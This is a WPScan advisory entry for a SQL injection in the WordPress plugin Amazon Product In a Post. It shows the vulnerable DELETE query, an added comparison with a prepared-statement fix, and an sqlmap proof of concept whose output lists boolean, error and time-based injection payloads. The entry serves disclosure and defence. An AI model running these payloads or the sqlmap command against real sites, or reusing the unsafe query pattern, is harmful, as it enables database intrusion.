Amazon Product In a Post Plugin - SQL Injection


Description
amazon-product-in-a-post.php - this plugin takes a raw user-supplied query variable and interpolates it directly into a DELETE statement run against the database. Because the value is never escaped or bound as a parameter, the query can be manipulated to perform SQL injection attacks.

Line 40:
$tempswe = $wpdb->query("DELETE FROM {$wpdb->prefix}amazoncache WHERE Cache_id ='{$wp->query_vars['appip-cache-id']}' LIMIT 1;");
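For comparison, the following is an added example (not the plugin's own code or its published fix) showing the vulnerable line beside a hardened form that binds the value through `$wpdb->prepare()`. It assumes the same table (`{$wpdb->prefix}amazoncache`, column `Cache_id`) and the same public query vars (`appip-cache-del`, `appip-cache-id`) as the snippet above; the function names `appip_delete_cache_unsafe`, `appip_delete_cache_safe` and `appip_handle_cache_delete` are hypothetical.

```php
<?php
// Added example, not the plugin's own patch. Table, column and query-var names
// are taken from the vulnerable line above; the function names are hypothetical.

// Vulnerable form (equivalent to line 40 of amazon-product-in-a-post.php):
// the raw query var is interpolated straight into the SQL string, so anything
// the client puts in it becomes part of the WHERE clause.
function appip_delete_cache_unsafe( $cache_id ) {
    global $wpdb;
    return $wpdb->query(
        "DELETE FROM {$wpdb->prefix}amazoncache WHERE Cache_id ='{$cache_id}' LIMIT 1;"
    );
}

// Hardened form: $wpdb->prepare() escapes the value and wraps it in quotes, so
// it is compared as a single literal and cannot alter the statement structure.
// %s is used because the original query compares Cache_id against a quoted
// string; if the column is actually an integer, %d is the stricter choice.
function appip_delete_cache_safe( $cache_id ) {
    global $wpdb;
    $table = $wpdb->prefix . 'amazoncache';
    $sql   = $wpdb->prepare(
        "DELETE FROM {$table} WHERE Cache_id = %s LIMIT 1",
        $cache_id
    );
    return $wpdb->query( $sql );
}

// Call site: only act when the delete action is explicitly requested and a
// cache id was supplied, and always go through the prepared variant.
function appip_handle_cache_delete() {
    global $wp;
    if ( ! isset( $wp->query_vars['appip-cache-del'], $wp->query_vars['appip-cache-id'] )
        || 'dodel' !== $wp->query_vars['appip-cache-del'] ) {
        return;
    }
    return appip_delete_cache_safe( $wp->query_vars['appip-cache-id'] );
}
```

With the prepared statement in place, the boolean-based, error-based and time-based payloads listed in the sqlmap output below are all passed to MySQL as the contents of one quoted string literal rather than as SQL, so none of the three injection points remain. Whether the delete action also needs a capability or nonce check is a separate question that this advisory does not cover.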
Proof of Concept
sqlmap -u "http://TARGET/index.php?appip-cache-del=dodel&appip-cache-id=2" -p appip-cache-id --dbms mysql

[02:00:47] [INFO] heuristic (basic) test shows that GET parameter 'appip-cache-id' might be injectable (possible DBMS: 'MySQL')
[02:00:47] [INFO] heuristic (XSS) test shows that GET parameter 'appip-cache-id' might be vulnerable to XSS attacks
[02:00:54] [INFO] GET parameter 'appip-cache-id' seems to be 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable 
[02:00:54] [INFO] GET parameter 'appip-cache-id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 
sqlmap identified the following injection points with a total of 271 HTTP(s) requests:
---
Parameter: appip-cache-id (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: appip-cache-del=dodel&appip-cache-id=2' RLIKE (SELECT (CASE WHEN (1323=1323) THEN 2 ELSE 0x28 END)) AND 'kTyF'='kTyF

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: appip-cache-del=dodel&appip-cache-id=2' AND (SELECT 4609 FROM(SELECT COUNT(*),CONCAT(0x7162627a71,(SELECT (CASE WHEN (4609=4609) THEN 1 ELSE 0 END)),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GuOh'='GuOh

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: appip-cache-del=dodel&appip-cache-id=2' AND (SELECT * FROM (SELECT(SLEEP(5)))hekc) AND 'oIki'='oIki
---

Affects

Plugin amazon-product-in-a-post-plugin

References

URL https://wordpress.org/plugins/amazon-product-in-a-post-plugin/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Jamie
Views 155
Verified No
WPVDB ID 7970

Timeline

Publicly Published 2015-05-07 (over 1 year ago)
Added 2015-05-08 (over 1 year ago)
Last Updated 2015-05-15 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.